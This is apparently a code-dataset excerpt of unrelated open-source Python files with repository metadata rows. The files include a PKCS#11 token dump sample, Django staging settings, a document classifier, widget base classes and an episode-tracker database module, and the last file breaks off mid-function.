for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith('/'):
new_flag = os.path.join(working_directory, flag)
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith(path_flag):
path = flag[len(path_flag):]
new_flag = path_flag + os.path.join(working_directory, path)
break
if new_flag:
new_flags.append(new_flag)
return new_flags
def FlagsForFile(filename):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = database.GetCompilationInfoForFile(filename)
final_flags = PrepareClangFlags(
MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_),
filename)
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute(flags, relative_to)
return {
'flags': final_flags,
'do_cache': True}
| mit | -1,765,271,193,283,489,800 | 28.821429 | 79 | 0.625948 | false |
Lenchik13/Testing | test/test_edit_contact.py | 1 | 1223 | from model.contact import Contact
import random
def test_edit_contact(app, db, check_ui):
app.open_home_page()
if app.contact.count() == 0:
app.contact.create(Contact(firstname="Contact", lastname="", nickname="",
address="", company="", home="",
mobile="", work="", fax="", email="",
email2="", email3="", homepage="",
byear="", address2="", phone2="",
notes="", bday="20", bmonth="6"))
old_contacts = db.get_contact_list()
rcontact = random.choice(old_contacts)
contact = Contact(lastname="lname", firstname="fname", address="address")
contact.id = rcontact.id
app.contact.modify_contact_by_id(contact)
app.open_home_page()
assert len(old_contacts) == app.contact.count()
new_contacts = db.get_contact_list()
old_contacts.remove(rcontact)
old_contacts.append(contact)
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui:
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
| apache-2.0 | -8,770,590,787,177,672,000 | 42.678571 | 123 | 0.58381 | false |
igorcoding/forum-api | api/api_helpers/common_helper.py | 1 | 1533 | import json
def required(param_list, args):
for param in param_list:
if type(param) != str:
raise Exception("param must be a string value")
if param not in args:
raise Exception("%s is required." % (param,))
def semi_required(param_variations, args):
atleast = False
all = True
for param in param_variations:
arg = param in args
atleast = atleast or arg
all = all and arg
if all:
raise Exception("All variations cannot be in one request simultaneously")
if not atleast:
raise Exception("None of variations is in the arguments list")
def optional(param, args, default=None, possible_values=None):
if param not in args:
args[param] = default
try:
args[param] = json.loads(args[param], encoding='utf-8')
except:
args[param] = args[param]
def check_arg(arg, values):
if arg not in values:
raise Exception("%s not in %s" % (arg, values))
if type(args[param]) == list and type(possible_values) == list:
for arg in args[param]:
check_arg(arg, possible_values)
if type(args[param]) != list and type(possible_values) == list:
check_arg(args[param], possible_values)
def make_boolean(params, arr):
for param in params:
arr[param] = bool(arr[param])
def check_empty(res, message):
if not res or len(res) == 0:
raise Exception(message)
def date_to_str(date):
return date.strftime("%Y-%m-%d %H:%M:%S") | mit | 8,430,216,498,991,779,000 | 25.448276 | 81 | 0.609915 | false |
hfalcic/PyKCS11 | samples/dumpit.py | 1 | 10079 | #!/usr/bin/env python
# Copyright (C) 2006-2008 Ludovic Rousseau ([email protected])
#
# This file is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from __future__ import print_function
import PyKCS11
import binascii
import getopt
import sys
import platform
# from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
# Title: Hex dumper
# Submitter: Sebastien Keim (other recipes)
# Last Updated: 2002/08/05
# Version no: 1.0
def hexx(intval):
x = hex(intval)[2:]
if (x[-1:].upper() == 'L'):
x = x[:-1]
if len(x) % 2 != 0:
return "0%s" % x
return x
def dump(src, length=8):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
N = 0
result = ''
while src:
s, src = src[:length], src[length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
N += length
return result
def usage():
print("Usage:", sys.argv[0], end=' ')
print("[-p pin][--pin=pin] (use --pin=NULL for pinpad)", end=' ')
print("[-c lib][--lib=lib]", end=' ')
print("[-S][--sign]", end=' ')
print("[-d][--decrypt]", end=' ')
print("[-h][--help]", end=' ')
try:
opts, args = getopt.getopt(sys.argv[1:], "p:c:Sd:h", ["pin=", "lib=", "sign", "decrypt", "help"])
except getopt.GetoptError:
# print help information and exit:
usage()
sys.exit(2)
pin_available = False
decrypt = sign = False
lib = None
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-p", "--pin"):
pin = a
if pin == "NULL":
pin = None
pin_available = True
elif o in ("-c", "--lib"):
lib = a
print("using PKCS11 lib:", lib)
elif o in ("-S", "--sign"):
sign = True
elif o in ("-d", "--decrypt"):
decrypt = True
red = blue = magenta = normal = ""
if sys.stdout.isatty() and platform.system().lower() != 'windows':
red = "\x1b[01;31m"
blue = "\x1b[34m"
magenta = "\x1b[35m"
normal = "\x1b[0m"
format_long = magenta + " %s:" + blue + " %s (%s)" + normal
format_binary = magenta + " %s:" + blue + " %d bytes" + normal
format_normal = magenta + " %s:" + blue + " %s" + normal
pkcs11 = PyKCS11.PyKCS11Lib()
pkcs11.load(lib)
info = pkcs11.getInfo()
print("Library manufacturerID:", info.manufacturerID)
slots = pkcs11.getSlotList()
print("Available Slots:", len(slots))
for s in slots:
try:
i = pkcs11.getSlotInfo(s)
print("Slot no:", s)
print(format_normal % ("slotDescription", i.slotDescription.strip()))
print(format_normal % ("manufacturerID", i.manufacturerID.strip()))
t = pkcs11.getTokenInfo(s)
print("TokenInfo")
print(format_normal % ("label", t.label.strip()))
print(format_normal % ("manufacturerID", t.manufacturerID.strip()))
print(format_normal % ("model", t.model.strip()))
session = pkcs11.openSession(s)
print("Opened session 0x%08X" % session.session.value())
if pin_available:
try:
session.login(pin=pin)
except:
print("login failed, exception:", str(sys.exc_info()[1]))
objects = session.findObjects()
print()
print("Found %d objects: %s" % (len(objects), [x.value() for x in objects]))
all_attributes = list(PyKCS11.CKA.keys())
# remove the CKR_ATTRIBUTE_SENSITIVE attributes since we can't get
# their values and will get an exception instead
all_attributes.remove(PyKCS11.CKA_PRIVATE_EXPONENT)
all_attributes.remove(PyKCS11.CKA_PRIME_1)
all_attributes.remove(PyKCS11.CKA_PRIME_2)
all_attributes.remove(PyKCS11.CKA_EXPONENT_1)
all_attributes.remove(PyKCS11.CKA_EXPONENT_2)
all_attributes.remove(PyKCS11.CKA_COEFFICIENT)
# only use the integer values and not the strings like 'CKM_RSA_PKCS'
all_attributes = [e for e in all_attributes if isinstance(e, int)]
for o in objects:
print()
print((red + "==================== Object: %d ====================" + normal) % o.value())
attributes = session.getAttributeValue(o, all_attributes)
attrDict = dict(list(zip(all_attributes, attributes)))
if attrDict[PyKCS11.CKA_CLASS] == PyKCS11.CKO_PRIVATE_KEY \
and attrDict[PyKCS11.CKA_KEY_TYPE] == PyKCS11.CKK_RSA:
m = attrDict[PyKCS11.CKA_MODULUS]
e = attrDict[PyKCS11.CKA_PUBLIC_EXPONENT]
if m and e:
mx = eval(b'0x' + binascii.hexlify(''.join(chr(c) for c in m).encode('ascii')))
ex = eval(b'0x' + binascii.hexlify(''.join(chr(c) for c in e).encode('ascii')))
if sign:
try:
toSign = b"12345678901234567890" # 20 bytes, SHA1 digest
print("* Signing with object 0x%08X following data: %s" % (o.value(), toSign))
signature = session.sign(o, toSign)
s = binascii.hexlify(''.join(chr(c) for c in signature).encode('ascii'))
sx = eval(b'0x' + s)
print("Signature:")
print(dump(''.join(map(chr, signature)), 16))
if m and e:
print("Verifying using following public key:")
print("Modulus:")
print(dump(''.join(map(chr, m)), 16))
print("Exponent:")
print(dump(''.join(map(chr, e)), 16))
decrypted = pow(sx, ex, mx) # RSA
print("Decrypted:")
d = binascii.unhexlify(hexx(decrypted))
print(dump(d, 16))
if toSign == d[-20:]:
print("*** signature VERIFIED!\n")
else:
print("*** signature NOT VERIFIED; decrypted value:")
print(hex(decrypted), "\n")
else:
print("Unable to verify signature: MODULUS/PUBLIC_EXP not found")
except:
print("Sign failed, exception:", str(sys.exc_info()[1]))
if decrypt:
if m and e:
try:
toEncrypt = "12345678901234567890"
# note: PKCS1 BT2 padding should be random data,
# but this is just a test and we use 0xFF...
padded = "\x00\x02%s\x00%s" % ("\xFF" * (128 - (len(toEncrypt)) - 3), toEncrypt)
padded = padded.encode('latin-1')
print("* Decrypting with 0x%08X following data: %s" % (o.value(), toEncrypt))
print("padded:\n", dump(padded, 16))
encrypted = pow(eval('0x%sL' % binascii.hexlify(padded)), ex, mx) # RSA
encrypted1 = binascii.unhexlify(hexx(encrypted))
print("encrypted:\n", dump(encrypted1, 16))
decrypted = session.decrypt(o, encrypted1)
decrypted1 = ''.join(chr(i) for i in decrypted)
print("decrypted:\n", dump(decrypted1, 16))
if decrypted1 == toEncrypt:
print("decryption SUCCESSFULL!\n")
else:
print("decryption FAILED!\n")
except:
print("Decrypt failed, exception:", str(sys.exc_info()[1]))
else:
print("ERROR: Private key don't have MODULUS/PUBLIC_EXP")
print("Dumping attributes:")
for q, a in zip(all_attributes, attributes):
if a == None:
# undefined (CKR_ATTRIBUTE_TYPE_INVALID) attribute
continue
if q == PyKCS11.CKA_CLASS:
print(format_long % (PyKCS11.CKA[q], PyKCS11.CKO[a], a))
elif q == PyKCS11.CKA_CERTIFICATE_TYPE:
print(format_long % (PyKCS11.CKA[q], PyKCS11.CKC[a], a))
elif q == PyKCS11.CKA_KEY_TYPE:
print(format_long % (PyKCS11.CKA[q], PyKCS11.CKK[a], a))
elif session.isBin(q):
print(format_binary % (PyKCS11.CKA[q], len(a)))
if a:
print(dump(''.join(map(chr, a)), 16), end=' ')
elif q == PyKCS11.CKA_SERIAL_NUMBER:
print(format_binary % (PyKCS11.CKA[q], len(a)))
if a:
print(dump(a, 16), end=' ')
else:
print(format_normal % (PyKCS11.CKA[q], a))
print()
if pin_available:
try:
session.logout()
except:
print("logout failed, exception:", str(sys.exc_info()[1]))
session.closeSession()
except PyKCS11.PyKCS11Error as e:
print("Error:", e)
| gpl-2.0 | 4,655,479,188,176,520,000 | 40.477366 | 108 | 0.509574 | false |
cineuse/CNCGToolKit | cgtkLibs/cgtk_os/delete_folder.py | 1 | 1091 | # coding=utf8
# Copyright (c) 2016 CineUse
import os
import shutil
import logging
import cgtk_log
log = cgtk_log.cgtk_log(level=logging.INFO)
def delete_folder(src):
"""
Deletes all files from inside a folder
.. warning::
This will delete all files in the folder specified
Args:
src (basestring): directory to clean
"""
if os.path.isfile(src):
try:
os.remove(src)
log.info(src)
except IOError:
pass
elif os.path.isdir(src):
try:
shutil.rmtree(src)
log.info(src)
except IOError:
for roots, dirs, files in os.walk(src):
for d in dirs:
itemsrc = os.path.join(roots, d)
for f in os.listdir(itemsrc):
itemfile = os.path.join(itemsrc, f)
try:
delete_folder(itemfile)
except IOError:
pass
if __name__ == "__main__":
delete_folder(r"E:\temp\needclear")
| mit | 3,809,987,850,486,803,500 | 22.717391 | 59 | 0.499542 | false |
GautamShine/toxic-docs | categorize.py | 1 | 3580 | #!/usr/bin/env python
"""
__author__ = 'Gautam Shine'
__email__ = '[email protected]'
Document classifier for the "Toxic Docs" repository from Columbia University
and the Center for Public Integrity. Data set consists of PDF files of
emails, memos, advertisements, news articles, scientific articles cited in
legal cases involving allegations of environmental harm from toxic substances.
"""
from processing import *
from modeling import *
from analyzing import *
import time
from sklearn.svm import LinearSVC
"""
Main
"""
if __name__ == '__main__':
bson_file = 'documents.bson'
label_key = 'document_type'
text_key = 'text'
# Process the raw data
dp = DataProcessor(text_key, label_key, num_chars=300)
da = DataAnalyzer(text_key)
docs, y_all, counts = dp.load_bson(bson_file)
t0 = time.time()
vectorizer, X_all_ngram, feat_names = dp.vectorize(docs, min_df=5, max_ngram=2)
vec_time = time.time() - t0
# Replace regex labels with human labels
y_all = np.loadtxt('labels.txt', dtype=np.int32)
# Add unkown labels for new set; old = 24085, new = 27829, total = 51914
y_all = np.hstack((y_all, -1*np.ones(27829, dtype=np.int32)))
counts = np.bincount(y_all[y_all != -1])
counts = [counts[i] for i in range(len(counts)) if i in dp.label_index_list]
# Add extra features from ToxicDocs to n-gram data matrix
key_list = ['num_pages']
feats = dp.get_feats(docs, key_list)
X_all = dp.stack_feats(X_all_ngram, feats)
key_list.append('length')
feat_names.extend(key_list)
print('Vectorization time:', vec_time)
print('Data matrix size:', X_all.shape)
y_train, X_train, ind_train, y_test, X_test, ind_test, X_unlab, ind_unlab =\
dp.split_data(y_all, X_all, split=0.7, seed=0)
me = ModelEvaluator()
# LinearSVC (liblinear SVM implementation, one-v-all)
cross_validate = True
if cross_validate:
model = LinearSVC(penalty='l2', loss='squared_hinge', dual=True, tol=0.0001,\
C=1, multi_class='ovr', fit_intercept=True, intercept_scaling=1,\
class_weight='balanced', verbose=0, random_state=None, max_iter=1000)
param_grid = {'C':np.logspace(-2,2,24).tolist()}
grid_info, grid_best, grid_time = me.param_search(model, param_grid,\
y_train, X_train, num_folds=10)
C = grid_best['C']
else:
C = 1
print('C: ', C)
SVM = LinearSVC(penalty='l2', loss='squared_hinge', dual=True, tol=0.0001,\
C=C, multi_class='ovr', fit_intercept=True, intercept_scaling=1,\
class_weight='balanced', verbose=0, random_state=None, max_iter=1000)
plot_learning = False
if plot_learning:
splits = np.linspace(0.1, 0.9, 300)
me.generate_learning_curve(SVM, X_train, y_train, splits)
# Train model on training set and check top 1 test accuracy
SVM_train_acc, SVM_train_time = me.train(SVM, y_train, X_train)
SVM_y_pred, SVM_test_acc, SVM_test_prec, SVM_test_rec, SVM_test_time =\
me.test(SVM, y_test, X_test, dp.label_index_list)
me.print_scores(dp, SVM_test_acc, SVM_test_prec, SVM_test_rec)
# Print top 3 accuracy
top_n_score, top_n_vec = me.top_n_acc(SVM, y_test, X_test, dp.label_index_list, n=3)
print(top_n_score)
# Retrain on all data
SVM.fit(sp.vstack((X_train, X_test)), np.hstack((y_train, y_test)))
# Save results to comma-separated text file
predictions = SVM.predict(X_all).reshape(1,-1)
np.savetxt('predictions.txt', predictions, fmt='%d', delimiter=', ')
| mit | 1,866,480,503,606,993,000 | 35.530612 | 88 | 0.644413 | false |
LinkCareServices/cairotft | cairotft/widgets/base.py | 1 | 5884 | # Copyright (c) 2015, Thomas Chiroux - Link Care Services
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of cairotft nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""base widget class."""
class BaseWidget():
"""Base class for all widgets.
:ivar display_object: (:class:`cairotft.tft.TftDisplay`) The display
object the widget will display itself.
:ivar pos_x: (:py:class:`int`) x coordinates to display the widget
:ivar pos_y: (:py:class:`int`) y coordinates to display the widget
:ivar width: (:py:class:`int`) the width of the widget
:ivar height: (:py:class:`int`) the height of the widget
"""
def __init__(self, display_object,
pos_x, pos_y, width, height):
"""Initialisation of the base widget.
:param display_object: the Display class instanciation.
:type display_object: :class:`cairotft.tfy.TftDisplay`
:param int pos_x: x coordinates to display the widget
:param int pos_y: y coordinates to display the widget
:param int width: the width of the widget
:param int height: the height of the widget
"""
self.display_object = display_object
self.pos_x = pos_x
self.pos_y = pos_y
self.width = width
self.height = height
self._stop = False
self._showing = False
def draw(self, ctx):
"""draw the widget.
implement this method in your subclasses
"""
raise NotImplementedError
def show(self, ctx):
"""show the icon."""
# here call the draw method (which includes the eventual blit)
self.draw(ctx)
def start(self, ctx):
"""Start showing the widget."""
self.display_object.loop.call_soon(
self.show, ctx)
def stop(self):
"""stop showing the widget."""
pass
class BaseAnimatedWidget(BaseWidget):
"""Base class for all Animated widgets.
see :class:`BaseWidget` for All BaseWidget variables
:ivar float interval_time: (:py:class:`float`) interval between
two frames (in seconds)
TODO: add transition support in BaseAnimatedWidget
"""
def __init__(self, display_object,
pos_x, pos_y, width, height,
interval_time=None):
"""Initialisation of the base animated widget.
:param display_object: the Display class instanciation.
:type display_object: :class:`cairotft.tfy.TftDisplay`
:param int pos_x: x coordinates to display the widget
:param int pos_y: y coordinates to display the widget
:param int width: the width of the widget
:param int height: the height of the widget
:param float interval_time: interval between two frames (in seconds)
the widget will first:
try to use the fps parameter to calculates a display interval
or: use the given interval_time
or: fix an interval time of 1second
"""
super().__init__(display_object, pos_x, pos_y, width, height)
if self.display_object.fps is not None and interval_time is not None:
self.interval_time = max(interval_time,
1 / self.display_object.fps)
elif self.display_object.fps is not None and interval_time is None:
self.interval_time = 1 / self.display_object.fps
elif self.display_object.fps is None and interval_time is not None:
self.interval_time = interval_time
else:
self.interval_time = 1
self._stop = False
self._showing = False
def draw(self, ctx):
"""draw the widget.
implement this method in your subclasses
"""
raise NotImplementedError
def show(self, ctx):
"""show the icon."""
if not self._stop:
# here call the draw method (which includes the eventual blit)
self._showing = True
self.draw(ctx)
# the call the next show
self.display_object.loop.call_later(
self.interval_time, self.show, ctx)
def start(self, ctx):
"""Start showing the widget."""
if not self._showing:
self._showing = True
self._stop = False
self.display_object.loop.call_soon(
self.show, ctx)
def stop(self):
"""stop showing the widget."""
self._stop = True
self._showing = False
| bsd-3-clause | 4,971,206,907,318,229 | 36.240506 | 79 | 0.64344 | false |
ouh-churchill/quod | config/settings/staging.py | 1 | 3522 | #!/usr/bin/python
# coding: utf-8
from __future__ import absolute_import, unicode_literals
'''
Local settings
- Use djangosecure
'''
from .common import * # noqa
print("DEBUG: Loading settings from staging")
# Because we're behind a reverse proxy, pay attention to where the request is coming from
USE_X_FORWARDED_HOST = True
FORCE_SCRIPT_NAME = env('FORCE_SCRIPT_NAME', default='/quod/')
# django-secure
# ------------------------------------------------------------------------------
# INSTALLED_APPS += ["djangosecure", ]
# SECURITY_MIDDLEWARE = [
# 'djangosecure.middleware.SecurityMiddleware',
# ]
# MIDDLEWARE = SECURITY_MIDDLEWARE + MIDDLEWARE
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool("DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True)
SECURE_FRAME_DENY = env.bool("DJANGO_SECURE_FRAME_DENY", default=True)
SECURE_CONTENT_TYPE_NOSNIFF = env.bool("DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True)
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# SITE CONFIGURATION
# ------------------------------------------------------------------------------
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
# ALLOWED_HOSTS = env.list('DJANGO_ALLOWED_HOSTS', default=['example.com']) -- In Common.py
# SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
# END SITE CONFIGURATION
INSTALLED_APPS += ["gunicorn", ]
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = env('DJANGO_EMAIL_HOST', default='localhost')
EMAIL_PORT = 25
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
DEFAULT_FROM_EMAIL = env('DJANGO_DEFAULT_FROM_EMAIL', default='QUODsite <[email protected]>')
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default='[QUODsite] ')
SERVER_EMAIL = env('DJANGO_SERVER_EMAIL', default=DEFAULT_FROM_EMAIL)
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See:
# https://docs.djangoproject.com/en/dev/ref/templates/api/#django.template.loaders.cached.Loader
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ]),
]
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(asctime)s %(levelname)s [%(name)s:%(lineno)s] %(module)s %(process)d %(thread)d %(message)s'
}
},
'handlers': {
'gunicorn': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'verbose',
'filename': env('GUNICORN_ERRORS_LOGFILE', default='/tmp/quod.gunicorn.errors'),
'maxBytes': 1024 * 1024 * 100, # 100 mb
}
},
'loggers': {
'gunicorn.errors': {
'level': 'DEBUG',
'handlers': ['gunicorn'],
'propagate': True,
},
}
}
| mit | -4,037,620,605,904,640,000 | 33.871287 | 117 | 0.592561 | false |
trevor/calendarserver | calendarserver/tools/push.py | 1 | 4102 | #!/usr/bin/env python
##
# Copyright (c) 2012-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from __future__ import print_function
from calendarserver.tools.cmdline import utilityMain, WorkerService
from argparse import ArgumentParser
from twext.python.log import Logger
from twisted.internet.defer import inlineCallbacks
from twext.who.idirectory import RecordType
import time
log = Logger()
class DisplayAPNSubscriptions(WorkerService):
users = []
def doWork(self):
rootResource = self.rootResource()
directory = rootResource.getDirectory()
return displayAPNSubscriptions(self.store, directory, rootResource,
self.users)
def main():
parser = ArgumentParser(description='Display Apple Push Notification subscriptions')
parser.add_argument('-f', '--config', dest='configFileName', metavar='CONFIGFILE', help='caldavd.plist configuration file path')
parser.add_argument('-d', '--debug', action='store_true', help='show debug logging')
parser.add_argument('user', help='one or more users to display', nargs='+') # Required
args = parser.parse_args()
DisplayAPNSubscriptions.users = args.user
utilityMain(
args.configFileName,
DisplayAPNSubscriptions,
verbose=args.debug,
)
@inlineCallbacks
def displayAPNSubscriptions(store, directory, root, users):
for user in users:
print
record = yield directory.recordWithShortName(RecordType.user, user)
if record is not None:
print("User %s (%s)..." % (user, record.uid))
txn = store.newTransaction(label="Display APN Subscriptions")
subscriptions = (yield txn.apnSubscriptionsBySubscriber(record.uid))
(yield txn.commit())
if subscriptions:
byKey = {}
for token, key, timestamp, userAgent, ipAddr in subscriptions:
byKey.setdefault(key, []).append((token, timestamp, userAgent, ipAddr))
for key, tokens in byKey.iteritems():
print
protocol, _ignore_host, path = key.strip("/").split("/", 2)
resource = {
"CalDAV": "calendar",
"CardDAV": "addressbook",
}[protocol]
if "/" in path:
uid, collection = path.split("/")
else:
uid = path
collection = None
record = yield directory.recordWithUID(uid)
user = record.shortNames[0]
if collection:
print("...is subscribed to a share from %s's %s home" % (user, resource),)
else:
print("...is subscribed to %s's %s home" % (user, resource),)
# print(" (key: %s)\n" % (key,))
print("with %d device(s):" % (len(tokens),))
for token, timestamp, userAgent, ipAddr in tokens:
print(" %s\n '%s' from %s\n %s" % (
token, userAgent, ipAddr,
time.strftime(
"on %a, %d %b %Y at %H:%M:%S %z(%Z)",
time.localtime(timestamp)
)
))
else:
print(" ...is not subscribed to anything.")
else:
print("User %s not found" % (user,))
| apache-2.0 | 8,099,020,124,651,099,000 | 38.442308 | 132 | 0.56314 | false |
frigg/frigg-common | frigg/projects.py | 1 | 1163 | # -*- coding: utf8 -*-
import logging
from os import listdir
from os.path import exists, isfile, join
import yaml
from .helpers import detect_test_runners
logger = logging.getLogger(__name__)
def build_tasks(directory):
try:
files = [f for f in listdir(directory) if isfile(join(directory, f))]
except OSError as e:
files = []
logger.error('Could not read files in path {}: \n {}'.format(directory, e))
return detect_test_runners(files)
def load_settings_file(path):
with open(path) as f:
return yaml.load(f)
def get_path_of_settings_file(directory):
if exists(join(directory, '.frigg.yml')):
return join(directory, '.frigg.yml')
elif exists(join(directory, '.frigg.yaml')):
return join(directory, '.frigg.yaml')
def build_settings(directory):
path = get_path_of_settings_file(directory)
settings = {
'webhooks': [],
}
if path is not None:
settings.update(load_settings_file(path))
else:
settings['tasks'] = build_tasks(directory)
if len(settings['tasks']) == 0:
raise RuntimeError('No tasks found')
return settings
| mit | 6,964,887,796,134,280,000 | 22.734694 | 83 | 0.638865 | false |
jethrogb/episoder | pyepisoder/episoder.py | 1 | 6798 | # episoder, https://code.ott.net/episoder
#
# Copyright (C) 2004-2020 Stefan Ott. All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import logging
from datetime import date, timedelta
import sqlite3
from sqlalchemy import Table, MetaData, create_engine, or_, and_
from sqlalchemy.orm import create_session
from .database import Episode, Show, Meta
class Database(object):
def __init__(self, path):
self._path = path
self.logger = logging.getLogger("Database")
self.open()
self._initdb()
def __str__(self):
return "Episoder Database at %s" % self._path
def __repr__(self):
return "Database(%s)" % self._path
def _initdb(self):
# Initialize the database if all tables are missing
tables = [Show, Episode, Meta]
tables = map(lambda x: x.__table__.exists, tables)
found = [x for x in tables if x(bind=self.engine)]
if len(found) < 1:
Show.__table__.create(bind=self.engine)
Episode.__table__.create(bind=self.engine)
Meta.__table__.create(bind=self.engine)
self.set_schema_version(4)
def open(self):
if self._path.find("://") > -1:
self.engine = create_engine(self._path,
convert_unicode=True)
else:
self.engine = create_engine("sqlite:///%s" % self._path)
self.conn = self.engine.connect()
self.metadata = MetaData()
self.metadata.bind = self.engine
self.session = create_session(bind=self.engine)
self.session.begin()
def close(self):
self.session.commit()
self.session.close()
self.conn.close()
self.engine.dispose()
def set_schema_version(self, version):
meta = Meta()
meta.key = "schema"
meta.value = "%d" % version
self.session.merge(meta)
self.session.flush()
def get_schema_version(self):
if not Meta.__table__.exists(bind=self.engine):
return 1
res = self.session.query(Meta).get("schema")
if res:
return int(res.value)
return 0
def clear(self):
episodes = self.session.query(Episode).all()
for episode in episodes:
self.session.delete(episode)
self.session.flush()
def migrate(self):
schema_version = self.get_schema_version()
self.logger.debug("Found schema version %s", schema_version)
if schema_version < 0:
self.logger.debug("Automatic schema updates disabled")
return
if schema_version == 1:
# Upgrades from version 1 are rather harsh, we
# simply drop and re-create the tables
self.logger.debug("Upgrading to schema version 2")
table = Table("episodes", self.metadata, autoload=True)
table.drop()
table = Table("shows", self.metadata, autoload=True)
table.drop()
Show.__table__.create(bind=self.engine)
Episode.__table__.create(bind=self.engine)
Meta.__table__.create(bind=self.engine)
schema_version = 4
self.set_schema_version(schema_version)
if schema_version == 2:
# Add two new columns to the shows table
self.logger.debug("Upgrading to schema version 3")
# We can only do this with sqlite databases
assert self.engine.driver == "pysqlite"
self.close()
upgrade = sqlite3.connect(self._path)
upgrade.execute("ALTER TABLE shows "
"ADD COLUMN enabled TYPE boolean")
upgrade.execute("ALTER TABLE shows "
"ADD COLUMN status TYPE integer")
upgrade.close()
self.open()
schema_version = 3
self.set_schema_version(schema_version)
if schema_version == 3:
# Add a new column to the episodes table
self.logger.debug("Upgrading to schema version 4")
# We can only do this with sqlite databases
assert self.engine.driver == "pysqlite"
self.close()
upgrade = sqlite3.connect(self._path)
upgrade.execute("ALTER TABLE episodes "
"ADD COLUMN notified TYPE date")
upgrade.close()
self.open()
schema_version = 4
self.set_schema_version(schema_version)
def get_expired_shows(self, today=date.today()):
delta_running = timedelta(2) # 2 days
delta_suspended = timedelta(7) # 1 week
delta_ended = timedelta(14) # 2 weeks
shows = self.session.query(Show).filter(or_(
and_(
Show.enabled,
